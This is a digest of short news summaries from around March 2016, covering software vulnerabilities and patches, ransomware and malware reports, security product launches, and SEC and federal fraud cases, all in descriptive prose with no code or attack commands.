Suffocating volume of security alerts challenge incident response. Phantom and Enterprise Strategy Group (ESG) released a report stating that 74 percent of large companies regularly disregard security alerts due to the increase in information technology (IT) activities that pull staff from daily workflow tasks. With the increase in IT activities, the report stated companies face challenges in monitoring incident response (IR) processes from end-to-end, maintaining the high volume of security alerts and external threat intelligence, and coordinating between information technology (IT) and security teams.
Google tracks use of HTTPS on top 100 websites. Google released its transparency report March 15 that tracks the progress of encryption efforts for its own products and the world’s most visited Web sites, as well as includes a new tracking service that monitors the state of Hypertext Transfer Protocol Secure (HTTPS) used on the world’s top 100 third-party Web sites.
AIG affiliates charged with mutual fund shares conflicts. The U.S. Securities and Exchange Commission announced March 14 that 3 American International Group, Inc., (AIG) affiliates, Royal Alliance Associates, Inc., SagePoint Financial, and FSC Securities Corporation agreed to pay more than $9.5 million to settle charges that the firms placed mutual fund clients in more expensive share classes in order to collect approximately $2 million in extra fees without disclosing to clients the option to buy shares without additional charges. The firms additionally failed to monitor advisory accounts on a quarterly basis, and failed to implement compliance policies and procedures that ensured advisory service fees and trading costs remained in the best interest of clients.
CEO of microcap company charged with securities fraud for falsely claiming millions in revenue from contracts with Nigeria and other foreign countries. Federal authorities in San Francisco announced charges against the chief executive officer (CEO) of RVPlus Inc., March 14 after he was arrested in San Francisco March 13 for allegedly filing false reports with the U.S. Securities and Exchange Commission (SEC) and creating misleading press releases and blog posts which falsely certified that RVPlus Inc., had entered into contracts with Nigeria, Haiti, and Liberia worth more than $1.9 billion, and held more than $26 million in short-term accounts receivables from the agreements. The CEO also falsely claimed that his not-for-profit, ECCO2 Corp., was an affiliate organization of the United Nations Convention on Climate Change and could receive over $100 billion in financial aid to fund the organization’s projects.
Recent wave of malware uses macro-enabled Word documents and Windows PowerShell. Security researchers from Palo Alto Networks discovered that attackers were using a new tactic to distribute malicious malware by combining spam campaigns, malicious Word documents, and Window’s PowerShell code. Researchers reported that the macro code, embedded within each malicious Word document, starts a hidden instance of Windows PowerShell to download malicious scripts.
Yahoo fixes ridiculously simple email address spoofing bug. Yahoo! released patches fixing an email spoofing vulnerability after a security researcher from Vulnerability Lab discovered Yahoo! Mail’s Basic interface, also named Classic Mode, allowed attackers to send malicious emails by changing Hypertext Transfer Protocol (HTTP) requests sent to the server and changing the “from address” associated with each new email.
Code.org flaw exposes volunteer email addresses. An official from Code.org, a non-profit organization that helps teach computer science, reported that the email addresses of its volunteers were allegedly compromised after a vulnerability was found on its Web site that allowed an unauthorized recruiting firm to obtain private email addresses. The company patched the flaw, stating that its servers were not vulnerable and the details of its 10 million teachers and students were not exposed.
Vulnerability in torrent portal software exposes user private information. An anonymous security researcher reported that the SceneAccess Web site, a private torrent portal, was susceptible to a security flaw in the built-in BBcodes (Bulletin Board Code) that allowed attackers to expose details pertaining to the Web sites’ users including exposing clients’ Internet Protocol (IP) addresses by nesting the BBcode inside an image Universal Resource Language (URL), and sending users the malicious image via open forum threads or private messages.
DROWN vulnerability still unpatched by most cloud services. A team of researchers released a report stating that the severe vulnerability, Decrypting RSA with Obsolete and Weakened eNcryption (DROWN) affecting many cloud services, was not patched after security researchers found the attack affects Hypertext Transfer Protocol Secure (HTTPS) and other services that rely on Secure Sockets Layer (SSL) and Transport Layer Security (TLS). The vulnerability allows attackers the ability to compromise an encrypted session even if the session is encrypted with a more secure TLS protocol.
SEC charges Oregon-based investment group and executives with defrauding investors. The U.S. Securities and Exchange commission charged Aequitas Management LLC, 3 executives, and 4 affiliates March 10 for defrauding over 1,500 investors nationwide after the firm did not disclose its insolvency to investors and continued to raise more than $350 million from January 2014 – January 2016 by issuing promissory notes with high rates of return. The firm used investor funds to repay earlier investors, for personal expenses, to pay business expenses, and for student loan receivables of for-profit education provider Corinthian Colleges.
Three high severity DoS flaws patched in BIND. The Internet Systems Consortium (ISC) released updates for several of its DNS software BIND product fixing three high severity denial-of-service (DoS) vulnerabilities that could allow remote attackers to crash the BIND name server (named) process by sending a specially crafted query.
“Libotr” library flaw exposes popular IM apps. A security researcher from X41 D-Sec firm discovered a serious vulnerability in the “libotr” library that could allow a remote attacker to execute arbitrary code by sending large messages that trigger a heap buffer overflow in libotr, as well as execute denial-of-service (DDoS) attacks. X41 D-Sec firm released a proof-of-concept intended to crash the Off-The-Record (OTR) plugin in Pidgin on x86_64 Linux systems.
Firefox 45 patches 22 critical vulnerabilities. Mozilla released Firefox 45 which patched 40 vulnerabilities in the Web browser components, including a heap-based buffer overflow flaw, and 14 flaws in its Graphite 2 library that could allow an attacker to execute arbitrary code execution and denial-of-service (DoS) attacks, among other patched vulnerabilities.
SAP patches 28 vulnerabilities across multiple products. SAP released several security updates for its various products patching 28 vulnerabilities including 6 cross-site scripting (XSS) and information disclosure flaws, 5 authentication by-pass flaws, 3 XML external entity flaws, and 2 implementation flaws, among other vulnerabilities.
CryptoWall, Locky dominate ransomware landscape: Report. Researchers from Fortinet released a report stating that the Locky ransomware was the second largest ransomware landscape and accounted for 16.47 percent of a total 18.6 million attacks collected. The ransomware is distributed internationally but has been primarily targeting U.S. users by sending malicious documents attached to spam emails.
Adobe patches flash zero-day under attack. Adobe released an emergency out-of-band update fixing a zero-day vulnerability after a security researcher from Kaspersky Lab found the flaw could allow an attacker to take control of vulnerable systems in limited, targeted occurrences.
Alabama car dealers admit bank fraud. Nashville officials announced March 10 that 2 New Market, Alabama residents pleaded guilty to charges alleging that the pair used their pre-owned car business to defraud 65 financial institutions by seeking multiple loans on over 100 vehicles from different financial institutions by using fraudulently obtained titles as collateral. The scheme caused $5.9 million in losses over a five year period.
Money returning to investors harmed by unregistered broker. The U.S. Securities and Exchange Commission (SEC) announced March 9 that Cyprus-based Banc de Binary Ltd., agreed to pay a total of $11 million to the SEC and Commodity Futures Trading Commission (CFTC) to settle charges that the company, its founder, and three affiliates illegally sold binary options to U.S. investors after the company failed to register as a broker-dealer before communicating directly with U.S. clients via phone, email, and instant messenger chats, and soliciting U.S. customers through YouTube videos, spam emails, and other Internet advertising outlets. A Fair Fund was established to compensate harmed investors and Banc de Binary Ltd., its founder, and its affiliates agreed to be suspended from the securities industry for a year and permanently banned from issuing penny stock offerings.
Greenwood man indicted for mortgage fraud scheme. A Greenwood, Missouri home builder, doing business as Penrod Homes, Inc., was charged March 8 for his role in a scheme to defraud mortgage lenders from May 2005 – June 2007 where he and others allegedly recruited buyers to apply for mortgage loans to purchase 61 homes in Greenwood and Peculiar that later went into foreclosure causing the banks and mortgage companies approximately $4.5 million in losses, and accepted illegal kickbacks totaling $1.5 million on 57 of the homes sold.
Greenville broker indicted in $3 million Ponzi scam. A former Greenville, South Carolina broker was indicted on Federal fraud charges March 8 after he allegedly ran a $2.8 million Ponzi scheme where he advised clients to invest their money into a fictitious company, SG Investment Management, provided investors with bogus earning statements, and returned a portion of the funds to make it appear as though the clients’ funds were invested and earning profits between 2000 – 2014.
Louisville attorney charged with wire fraud and money laundering. The U.S. Attorney’s Office in Kentucky announced March 8 that a former attorney and executor of 7 estates was indicted on Federal charges after he allegedly defrauded the estates of approximately $1,666,671 by withdrawing cash from the estate accounts without authorization and using the money for personal expenses while mischaracterizing the withdrawals as estate expenses from November 2008 – February 2015. The executor also allegedly laundered fraud proceeds by using funds from one estate to conceal the depletion of the funds from another estate in July 2014.
600,000 TFTP servers can be abused for reflection DDoS attacks. Researchers from the Edinburgh Napier University reported that a combination of flaws in Trivial File Transfer Protocol (TFTP) and publicly-exposed TFTP servers can easily be exploited for attackers to abuse misconfigured setups for reflection denial-of-service (DDoS) attacks after finding that 599,600 TFTP servers were publicly open and had an amplification factor of 60. The vulnerable TFTP servers can be used to launch attacks on other Internet-available services, or used as a pathway for targets inside a closed network.
Cisco patches a bunch of cable modem vulns. Cisco Systems reported three vulnerable systems were open to attackers including two wireless gateways, the DPC3941 and DPC3939B, that can allow attackers to exploit the Web-based administration interface via specially crafted Hypertext Transfer Protocol (HTTP) requests; two cable modems, the DPC2203 and EPC2203, that can allow attackers to execute remote code execution via an HTTP input validation vulnerability; and one gateway, the DPQ 3925, that can allow attackers to perform denial-of-service (DDoS) attacks via an HTTP handling flaw.
Samsung fixes driver update tool to prevent malicious takeover. Samsung released updates for its SW Update Tool patching two security-related issues that could have been exploited to perform Man-in-the-Middle (MitM) attacks after a security researcher from Core Security discovered that when contacting Samsung’s servers, the SW Update Tool sent all users’ information in cleartext and did not check for the data’s authenticity after the software received the driver downloads from Samsung’s servers. Samsung patched the issues by implementing a ciphered communication between the tool and its servers, and inputting a verification mechanism of the downloaded drivers.
Triada trojan most advanced mobile malware yet: Kaspersky. Security researchers from Kaspersky discovered a new trojan reportedly believed to be the most advanced mobile malware yet, dubbed Triada that targets Android operating system (OS) devices to redirect financial short message service (SMS) transactions to buy additional content or steal money from victims via an advertising botnet that is embedded with rooting capabilities. The trojan also uses the Zygot parent process to implement its code in the context of all software on the target’s device, allowing the trojan to run in each application.
Man spent $100K with stolen credit cards, fraud cases cracked police say. A Detroit man was arrested March 4 after he allegedly used stolen credit card information to purchase $100,000 worth of gift cards, iPads, electronic games, among other products at a minimum of 4 Kent County businesses. A subsequent search of the suspect’s home revealed hundreds of credit cards, credit-card numbers, Social Security numbers, personal information, and equipment to encode credit cards with stolen account information.
SEC announces charges against unregistered fund manager accused of hiding criminal past. The U.S. Securities and Exchange Commission charged EquityStar Capital Management and an unregistered fund manager March 8 for deceiving investors after the fund manager and company offered and sold at least $5.6 million of interests in two unregistered investment funds, Global Partners Fund and Momentum Growth Fund, and withdrew more than $1 million without the authorization or knowledge of investors. The fund manager hid felony fraud convictions and other money judgments from investors, hired a firm to manipulate Internet search results on his name to cover up negative information, and used at least three false identities to make-up the existence of bogus employees when communicating with investors, among other actions.
Virginia man pleads guilty to Federal charges for role in massive identity theft and tax fraud scheme. A Virginia man pleaded guilty March 7 for his role in a $42 million Federal income tax refund fraud scheme involving over 12,000 fraudulent tax returns and 19 co-conspirators who stole the identities of individuals and filed returns to addresses in Virginia, Maryland, and Washington, D.C. from 2008 to 2015. The suspect was responsible for filing approximately 444 fraudulent income tax returns that sought more than $1.5 million in tax refunds and caused a loss of $493,436 to the U.S. Department of the Treasury.
KeRanger ransomware is actually Linux.Encoder ported for Macs. Security researchers from Bitdefender reported that the KeRanger ransomware that targets Mac OS X systems is a rewrite of the Linux.Encoder ransomware after finding that the encryption functions of each ransomware were identical to each other and that both ransomwares share the same names: encrypt_file, recursive_task, currentTimestamp, and creatDaemon.
Microsoft updates Windows, browsers to patch critical flaws. Microsoft released 13 security bulletins addressing several vulnerabilities in Windows, Internet Explorer, Edge browser, Office, Server Software, and the .NET Framework including 13 Internet Explorer vulnerabilities that could allow a remote attacker to execute arbitrary code by tricking a victim into visiting a specially crafted Web site; 11 Microsoft Edge vulnerabilities; and critical vulnerabilities in how the Windows Adobe Type Manager Library handles specially crafted Type fonts which can be exploited for denial-of-service (DoS) attacks and remote code execution (RCE) attacks, among other vulnerabilities.
Adobe patches flaw in Acrobat, Reader, Digital Editions. Adobe Systems released updates for its Acrobat, Reader, and Digital Editions products to patch several critical vulnerabilities including multiple memory corruption flaws and a directory search path flaw that can be exploited to execute arbitrary code in several of the products.
Mock cyberattack tests response. The U.S. Department of Homeland Security and the U.S. Secret Service reported that more than 1,000 U.S. cybersecurity professionals from the Federal government, healthcare firms, Internet service providers, retail businesses, and phone companies were participating in a mock cyberattack exercise March 8 – March 10 to test human response and coordination in the event of a real-life cyberattack. The exercise will also look for areas of improvement to help the public and private sector become more resilient against cyber threats.
SEC charges Rhode Island agency and Wells Fargo with fraud in 38 Studios bond offering. The U.S. Securities and Exchange Commission charged Rhode Island Economic Development Corporation (RIEDC), two former executives, Wells Fargo Securities, and a former lead banker March 7 for defrauding investors in a $75 million municipal bond offering to finance 38 Studios, a startup video game company, after RIEDC allegedly loaned the startup only $50 million in bond proceeds and used the remaining proceeds to pay related bond offering expenses and establish other funds. RIEDC and Wells Fargo reportedly failed to disclose to investors that 38 Studios faced a funding shortage and could not produce the video game, causing the company to default on the loan, and failed to disclose that Wells Fargo had a side deal with 38 Studios which enabled the firm to receive additional compensation.
Google plugs 19 holes in newest Android security update. Google released 19 security issues for its Android Open Source Project (AOSP) after its company’s security researchers found two remote code execution (RCE) vulnerabilities in Mediaserver that can be leveraged via a specially crafted file, as well as discovering a critical vulnerability in the Qualcomm performance component that can be leveraged to allow elevation of privileges flaw, enabling a local malicious application to execute arbitrary code in the kernel, among other vulnerabilities.
Facebook password reset flaw earns researchers $15,000. An independent researcher from India discovered a brute-force vulnerability in Facebook’s beta.facebook.com domain that could allow an attacker to change user account passwords by easily finding the six-digit code sent to customers requesting a password reset via email or text message. Facebook patched the vulnerability February 23.
Intel fixes McAfee bug that allowed attackers to disable antivirus protection. Intel Security released version SB10151 for its McAfee Enterprise antivirus program after a security researcher from Mediaservice found attackers could bypass the administration password and unlock the safe registry keys in the McAfee VirusScan Enterprise engine due to the feature’s improper implementation.
Multiple passcode bypass vulnerabilities discovered in iOS 9. Researchers from Vulnerability Lab reported that Apple’s iOS versions 9.0, 9.1, and 9.2.1 contain several connected passcode bypass vulnerabilities and affects iPhone 5, 5s, 6, and 6s, as well as iPad mini, iPad 1 and iPad 2 products. The vulnerability can allow an attacker to access a device and compromise sensitive user data, including address books, photos, short message service (SMS), multimedia messaging service (MMS), emails, and phone settings, among other data.
Stillwater investment adviser admits cheating clients out of $2.6M. A former investment adviser at Alternative Wealth Solutions pleaded guilty March 1 to Federal charges after he bilked approximately 50 investors in Minnesota and Wisconsin out of nearly $2.6 million and used the money to cover promised returns to other investors and for personal expenses. The adviser also admitted to creating counterfeit secured notes as proof of investment.
Scam artists hit Seagate Technology. Cupertino-based Seagate Technology reported that its current and former employees’ personal information including tax information, Social Security numbers, and salaries were compromised after a phishing email disguised as a legitimate internal company request prompted an employee to disclose employee data to an unauthorized third party. The company notified the U.S. Internal Revenue Service and is offering an identify-theft protection service to those affected.
Amazon changes stance on encryption for fire tablets. Amazon.com, Inc., reported March 5 that it will be returning its Kindle Fire devices to full disk encryption and will be releasing the security feature with a Fire operating system (OS) update. The company previously removed the enterprise features in 2015 due to low customer usage.
First fully functional Mac ransomware spread via transmission BitTorrent client. Researchers from Palo Alto reported that the official Transmission BitTorrent Web site used by Mac customers was allegedly hacked after researchers found that the Transmission Web site was replaced for Mac version 2.90, which came embedded with the KeRanger ransomware. The ransomware targets over 300 file extension types, uses Advanced Encryption Standard (AES) encryption to lock files, and demands a 1 Bitcoin payment fee.
Popular WordPress plugin comes with a backdoor, steals site admin credentials. Security researchers from Sucuri discovered that an unknown attacker named wooranker was able to control WordPress user login, create and edit commands, and intercept user data before encryption, among other actions, by using a popular WordPress plugin, Custom Content Type Manager (CCTM). The attacker used the plugin to install an auto-update.php backdoor, forcing the target’s side to download and install another file named c.php, which would create wp-options.php to alter core WordPress files.
FBI: ‘Pinball Bandit’ robs another Hyde Park bank. The FBI is searching for a suspect dubbed the “Pinball Bandit” after he allegedly robbed the Fifth Third Bank in Hyde Park, Illinois, March 2 and is suspected of committing five other bank robberies across Chicago since January.
Apple reissues security update after blocking Ethernet on Mac OS X. Apple Inc., reissued a security updates for its OS X El Capitan systems, which patched a blacklisting issue after an initial security update blocked Ethernet drivers and blocked Internet access to affected Mac systems when using an Ethernet connection. Apple reported that Wi-Fi connections were not affected.
Cisco patches critical, high severity flaws in NX-OS. Cisco Systems, Inc., released software updates for several of its products including the NX-OS network operating system (OS) running on Nexus 3000 series, Nexus 3500 platform switches, which patched a critical vulnerability that could allow a remote, unauthenticated attacker to log into a compromised device with root privileges via an account with default credentials, among other vulnerabilities. Cisco also released patches for several other versions of its Nexus series products, including a high severity denial-of-service (DoS) vulnerability in the Simple Network Management Protocol (SNMP) input packet processor.
Hardcoded password exposes RSA Conference badge scanning app. Researchers from Bluebox Security reported that the badge scanning application provided by organizers of the 2016 RSA Conference to vendors was susceptible to a security bypass flaw after researchers analyzed the app’s code and discovered that the security mechanism could be bypassed due to an embedded plain text default password in the application’s code.
Ad Code for many advertising networks vulnerable to basic XSS attacks. An independent security researcher discovered that many advertising networks were unknowingly allowing attackers to launch cross-site scripting (XSS) attacks by not applying the same input sanitization procedures to data following a hash (#) in the code of the Uniform Resource Locator (URL). Attackers could spread links to legitimate, authentic pages that have malicious XSS payloads attached to the end of a URL.
Dell SecureWorks speeds up endpoint intrusion detection, response. Dell SecureWorks Inc., reported that it is launching its Advanced Endpoint Threat Detection (AETD) Red Cloak solution which is designed to cut down the time required to detect and respond to cyber-attacks, especially for non-malware attacks. The Software as a Service (SaaS) solution will be powered by experts from the Counter Threat Unit (CTU), who will provide updated threat intelligence information.
Windows built-in PDF reader exposes Edge browser to hacking. A security researcher from IBM’s X-Force Advanced Research team discovered that Microsoft Window’s built-in Windows Runtime (WinRT) PDF for its Edge Web browser can be leveraged by attackers to execute drive-by attacks in a similar method that the Angler or Neutrino exploit kits (EK) deliver Flash, Java, or Silverlight payloads. Attackers can create a WinRT PDF exploit within their PDF file, which can be secretly opened while using an iframe positioned off screen with Cascading Style Sheets (CSS), and can use the malicious code to execute and exploit the WinRT PDF vulnerability.
Police seize at least 250 stolen credit cards in West Greenwich, Cranston. Five New York residents were arrested in Rhode Island February 27 and March 1 after authorities found a total of 309 stolen credit cards and gift cards in the suspects’ vehicles during traffic stops. Three of the culprits used the stolen credit cards to purchase $19,000 worth of merchandise in Virginia and the remaining two suspects used the stolen credit cards to purchase additional gift cards at local Stop & Shop Supermarkets.
NSA chief worries about cyber attack on US infrastructure. The U.S. National Security Agency chief warned March 1 that attackers may try to execute a cyberattack against U.S. infrastructure similar to a 2015 Ukrainian incident in which a computer virus caused the networks of several regional electricity companies to go offline, and caused power grid failures throughout the country. Officials reported that partnerships between the public and private sectors were key to preventing such attacks.
Kaspersky launches Targeted Attack protection platform. Kaspersky Lab released its new solution, Kaspersky Anti Targeted Attack Platform which can help companies reduce the risk of advanced threats and targeted attacks, detect security breaches and attempts to penetrate entities’ networks, and help organizations take immediate mitigation actions. The platform also helps predict where new targeted attacks will occur via an Advanced Sandbox, which provides an isolated environment for analysis of suspicious objects, as well as via a Targeted Attack Analyzer, which leverages data processing and machine learning technology to assess events and combine feedback from various analysis engines.
Microsoft unveils Advanced Threat Protection service. Microsoft released its new service titled, Windows Defender Advanced Threat Protection which is designed to help organizations detect, investigate, and respond to advanced attacks on organizations’ networks and will bring a post-breach layer of protection to the Windows 10 security platform by using Windows behavior sensors, cloud-based security analytics, and threat intelligence.
Google’s DLP for Gmail adds optical character recognition. Google Inc., reported it will be releasing a new set of features for its Data Loss Prevention (DLP) for Gmail which will help administrators set DLP policies to analyze common image types and extract text for policy evaluation, in addition to improving attachment scanning, setting new predefined content detectors, and increasing control over content detection thresholds through new features such as Optical character recognition (OCR).
BluVector 2.0: Machine-learning malware detection. Acuity Solutions reported it will be releasing its BluVector version 2.0, a malware detection solution, which will help companies identify threats, find previously unclassified and undetected attacks, and help security analysts understand how their organizations are being targeted within milliseconds. The threat detection appliance analyzes files from the Hypertext Transfer Protocol (HTTP), Simple Mail Transfer Protocol (SMTP), and File Transfer Protocol (FTP) protocols using BluVector’s machine-learning classification engine and extracts features from each file to determine if the file is malicious based on the device’s knowledge of benign and malicious files.
Former bank VP pleads guilty to fraud. The former vice president (VP) of Mechanics Bank in Water Valley, Mississippi, pleaded guilty February 25 to Federal charges after he embezzled over $1.3 million in an elaborate scheme to obtain bank money, funds, credits, assets, securities, and other property, owned and controlled by Mechanics Bank. The former VP issued loans and lines of credits in the names of unsuspecting bank customers, used the money for personal expenses, and made payments on other fraudulent loans.
Snapchat falls foul of CEO impersonation, hands over employee pay data. The video messaging application, Snapchat reported that many of its current and former employees’ payroll information was compromised after a cyber-attacker impersonated the firm’s chief executive officer (CEO) via a phishing campaign and collected employee payroll information from staff at the firm. Snapchat stated that the incident was contained and reported the scheme to the FBI.
One in ten top internet sites may be vulnerable to CSRF and XSS attacks. A CloudFlare engineer discovered that about 10 percent of Alexa Top 1 Million Web sites allowed resources to be shared outside of their domain due to improperly configured Cross-Origin Resource Sharing (CORS) settings, enabling hackers to steal users’ private session details and log into users’ accounts to carry out fraudulent operations via cross-site request forgery (CSRF) and cross-site sLcripting (CSS) attacks.
The most common vulnerabilities in open source Web applications are XSS and SQLi. The security firm, Netsparker released a report detailing that 396 Web applications were plagued with 269 security vulnerabilities after a study revealed that 180 vulnerabilities were cross-site scripting (XSS) flaws, 55 vulnerabilities were Structured Query Language (SQL) injection (SQLi) flaws, and 16 vulnerabilities were Remote and Local file Inclusion flaws, among other vulnerabilities.
Pentagon boosts spending to fight cyber attacks. The U.S. Secretary of Defense reported February 25 that the Pentagon will spend a total of $6.7 billion in 2017 in an effort to deter advanced cyber adversaries, invest in cyber warfare capabilities, and fund cyber strategy.
Google helps news sites thwart DDoS attacks. Google announced the public release of its Project Shield initiative which aims to protect news Web sites from distributed denial-of-service (DDoS) attacks and aims to keep smaller journalism Web sites safe from cyber-attacks. The initiative now allows small news sites to serve their content through Google’s infrastructure without having to move their hosting location.
90 percent of all SSL VPNs use insecure or outdated encryption. Researchers from High-Tech Bridge discovered that many Secure Sockets Layer (SSL) Virtual Private Networks (VPNs) servers were using insecure or outdated encryption after an analysis of 10,436 servers revealed that about 76 percent of all SSL VPN servers used untrusted SSL certificates, allowing attacks to mimic and launch man-in-the-middle (MitM) attacks on unsuspecting users.